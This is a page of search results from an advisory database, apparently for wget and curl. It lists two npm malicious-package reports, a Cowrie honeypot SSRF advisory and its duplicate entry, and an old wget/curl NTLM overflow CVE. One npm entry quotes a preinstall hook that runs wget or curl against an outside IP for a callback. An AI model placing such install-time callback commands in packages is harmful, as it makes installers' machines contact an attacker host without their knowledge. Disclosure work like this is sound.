5 matches found
MAL-2026-5719 Malicious code in ect-654321 (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector ec784a9a1926de8d2c18de41c996e69e10f7001bf9fdc7604edc22d5775b4540 ect-654321 contains only a package.json with a preinstall lifecycle hook that unconditionally executes wget...
MAL-2026-5721 Malicious code in ect-839201-ctf (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector bda37f74ff0d1b56cb7805906d4fd32a7e2ccc15aa96768d9f9e510202712dcb On npm install, package.json's preinstall script executes wget http://10.107.121.85:8000/callbackwget || curl http://10.107.121.85:8000/callbackcurl ...
Cowrie has a SSRF vulnerability in wget/curl emulation enabling DDoS amplification
Summary A Server-Side Request Forgery SSRF vulnerability in Cowrie's emulated shell mode allows unauthenticated attackers to abuse the honeypot as an amplification vector for HTTP-based denial-of-service attacks against arbitrary third-party hosts. Details When Cowrie operates in emulated shell...
PT-2025-54458
Name of the Vulnerable Software and Affected Versions Cowrie versions prior to 2.9.0 Description Cowrie versions before 2.9.0 have a server-side request forgery SSRF issue in the emulated shell implementations of wget and curl. The default configuration allows these commands to make real outbound...
DEBIAN-CVE-2005-3185
Stack-based buffer overflow in the ntlmoutput function in http-ntlm.c for 1 wget 1.10, 2 curl 7.13.2, and 3 libcurl 7.13.2, and other products that use libcurl, when NTLM authentication is enabled, allows remote servers to execute arbitrary code via a long NTLM username...